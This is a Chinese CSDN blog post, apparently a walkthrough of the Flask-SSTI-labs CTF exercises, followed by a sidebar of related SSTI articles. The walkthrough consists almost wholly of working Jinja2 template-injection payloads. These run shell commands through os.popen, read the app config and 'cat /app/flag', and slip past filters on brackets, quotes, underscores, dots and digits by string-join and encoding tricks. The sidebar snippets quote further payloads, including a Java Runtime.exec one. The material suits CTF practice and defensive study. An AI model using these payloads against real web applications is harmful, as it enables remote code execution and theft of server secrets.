SSTIpaload

已于 2024-04-06 20:39:01 修改
阅读量193 收藏 1
点赞数 3
文章标签: linux 运维 服务器
于 2024-03-19 16:25:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80552914/article/details/136846124
版权
文章描述了一系列在Flask应用中发现的安全敏感类型注入(SSTI)漏洞,从无过滤payload到逐步利用不同方法绕过过滤机制,最终目标是获取config信息。每个阶段展示了攻击者如何利用字符串拼接、编码和特殊字符过滤来执行代码并获取敏感数据。
摘要由CSDN通过智能技术生成

第一关无过滤:payoad:

{{lipsum.__globals__.__builtins__.__import__('os').popen('ls').read()}}

第二关过滤{}:payload:

{%print lipsum.__globals__.__builtins__.__import__('os').popen('ls').read()%}

第三关无回显:payload:写入静态文件

{{lipsum.__globals__['os'].popen('echo `ls` >/app/static/1.txt').read()}}

第四关过滤[]:

{{lipsum.__globals__.get('os').popen('ls').read()}}

第五关过滤‘’:可以使用request绕过

第六关过滤_:

把__编码即可

第七关过滤.:用[]代替.

{{lipsum['__globals__']['os']['popen']('ls')['read']()}}

第八关过滤[“class”, “arg”, “form”, “value”, “data”, “request”, “init”, “global”, “open”, “mro”, “base”, “attr”]

字符串拼接绕过:

第九关过滤数字:但是我们的payload没有数字

用上一关的即可

第十关

这一关的目标不是flag,而是获取config,可以通过current_app来获取

{{url_for.__globals__['current_app'].config}}

第11关过滤[’’’, ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’

{%set %}拼接

{%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set cmd=dict(l=a,s=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%} 
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}


code={%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%} 
{%set f=dict(__buil=a,tins__=a)|join%}
{%set ch=dict(ch=a,r=a)|join%}
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}
{%set cmd=(dict(ca=a,t=a)|join,chh(32),chh(47),dict(ap=a,p=a)|join,chh(47),dict(fl=a,ag=a)|join)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

第12关过滤[‘_’, ‘.’, ‘0-9’, ‘\’, ‘’', ‘"’, ‘[’, ‘]’]

{{()|select|string|list}}:截取环境字符

返回字符 可以通过下标取到结果

但是这里禁止了数字0-9

可以通过过滤器 | length 或者| count取到

{%set numa=dict(aaaaaaaaaaaaaaaaaaaaaaaa=b)|join|count%}
{%set p=dict(po=a,p=a)|join%}
{{()|select|string|list|attr(p)(numa)}}


{%set numa=dict(aaaaaaaaaaaaaaaaaaaaaaaa=b)|join|count%}
{%set p=dict(po=a,p=a)|join%}
{%set xhx=()|select|string|list|attr(p)(numa)%}
{%set a=(xhx,xhx,dict(glo=a,bals=a)|join,xhx,xhx)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=(xhx,xhx,dict(ge=a,titem=a)|join,xhx,xhx)|join%}
{%set f=(xhx,xhx,dict(buil=a,tins=a)|join,xhx,xhx)|join%}
{%set ch=dict(ch=a,r=a)|join%}
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}
{%set numb=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set numc=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set cmd=(dict(ca=a,t=a)|join,chh(numb),chh(numc),dict(ap=a,p=a)|join,chh(numc),dict(fl=a,ag=a)|join)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

第13关用上一题payload

如果过滤[’’’, ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’_']'

{%set%0apo=dict(po=a,p=a)|join()%}
{%set%0aa=(()|select|string|list)|attr(po)(24)%}
{%set%0aglo=(a,a,dict(glo=aa,bals=aa)|join,a,a)|join()%}
{%set%0ageti=(a,a,dict(ge=aa,titem=aa)|join,a,a)|join()%}
{%set%0ape=dict(po=aaa,pen=aaa)|join()%}{%set%0are=dict(rea=aaaaa,d=aaaaa)|join()%}
{{lipsum|attr(glo)|attr(geti)(dict(o=a,s=a)|join())|attr(pe)(((()|select|string|list)|attr(po)(15),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(16),(()|select|string|list)|attr(po)(10),(config|string|list)|attr(po)(279),(()|select|string|list)|attr(po)(41),(()|select|string|list)|attr(po)(20),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(1))|join())|attr(re)()}}

CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记-CSDN博客

具体细节看这位大佬

cyxalmm
关注
zseob6jv7jq3dz.html,Open H.323 — [OpenH323]Intel codecs G729 A AB B, G723.1 6.3, G723.1 5.3 plugin f...
weixin_30591519的博客
06-18 21万+
------------61301EA571264FContent-Type: text/plain; charset=Windows-1251Content-Transfer-Encoding: 8bitHello all,Extract archive and compile Audio Plugin "IntelCodecs" in MS VisualStudio .NET 2003. To...
ssti-payloadSSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 1803
SSTI总结:流程和绕过
SSTI Payloads 开源项目教程
最新发布
gitblog_00098的博客
08-16 339
SSTI Payloads 开源项目教程 ssti-payloads???? Server Side Template Injection Payloads项目地址:https://gitcode.com/gh_mirrors/ss/ssti-payloads 项目介绍 SSTI Payloads 是一个开源项目,专注于提供服务器端模板注入(Server-Side Template Injection...
ssti模版注入(看完就会了)(1),2024年最新成功入职腾讯
芯_v_648374雨馨博客
04-15 927
_class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
SSTI的常用payload
weixin_45649612的博客
10-11 579
命令执行 exp:目录读取 {{config.class.init.globals[‘os’].popen(‘ls …/’).read()}} 文件读取 exp:读取该目录app/flag的文件 {{config.class.init.globals[‘os’].popen(‘cat /app/flag’).read() }}
基于SSTI模块注入的常用payload总结
Welcome To Myon'Blog !
07-05 1303
一、查找函数位置,利用函数实现 1、利用file函数进行读取 2、利用内嵌函数eval进行命令执行 3、利用linecache函数进行命令执行 二、查找类的位置,利用类下的函数实现 1、利用_frozen_importlib_external.FileLoader类 2、利用importlib类进行命令执行 3、利用subprocess.Popen类进行命令执行 三、利用os模块进行命令执行 1、利用config 2、利用url_for 3、利用子类的os模块 四、关于其他的利用
SSTIpayload构造思路
shawdow_bug的博客
04-24 2162
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
《附件》--- SSTI的无脑找的,没有知识含量的payload
Zero_Adam的博客
02-09 276
我把能搜过来的payload都搜过来,,,, 碰到题再说吧,,,这payload太多了啊。。。 这个模板可以用来现找payload 自己再改一改就好了 {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ .
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads
gitblog_00036的博客
04-17 363
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads ssti-payloads???? Server Side Template Injection Payloads项目地址:https://gitcode.com/gh_mirrors/ss/ssti-payloads 在这个数字化的时代,安全是任何在线服务的基石。软件供应链中的漏洞(如 Server-Side...
ctf ssti 各种payload与绕过(后续会补充 绕过)
m0_59855041的博客
06-07 648
_class__ 返回一个实例所属的类__mro__ 查看类继承的所有父类,直到object__subclasses__() 获取一个类的子类,返回的是一个列表__bases__ 返回一个类直接所继承的类(元组形式)__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化__globals__ 使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典,与func_globals等价。
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5700
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
SSI常用payload收集
Fly_鹏程万里
08-13 282
A、显示服务器端环境变量<#echo> 本文档名称: <!–#echo var="DOCUMENT_NAME"–> 现在时间: <!–#echo var="DATE_LOCAL"–> 显示IP地址: <! #echo var="REMOTE_ADDR"–> B、将文本内容直接插入到文档中<#include> ...
SSTI模板注入
Welcome To Myon'Blog !
07-04 1045
1、原理简述 2、常用payload及相关脚本 函数调用、高危函数 3、实战:攻防世界 Web_python_template_injection
ssti总结
m0_52432374的博客
09-18 2613
小学的时候拿别人的好词好句,套在我们自己的作文里,此时我们的作文就相当于模板,而别人的好词好句就相当于传递进模板的内容。那么什么是模板注入呢,当不正确的使用模板引擎进行渲染时,则会造成模板注入通俗点理解:拿到数据,塞到模板里,然后让渲染引擎将赛进去的东西生成 html 的文本,返回给浏览器,这样做的好处展示数据快,大大提升效率。
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
SSTI-3 常用模块及利用方法
ZQING
08-20 488
SSTI 漏洞的两种利用方式 文件读取(很多适合可配合此法解出 pin 码) RCE 远程代码执行
SSTI漏洞原理及渗透测试
二狗的博客
02-14 636
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 1万+
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值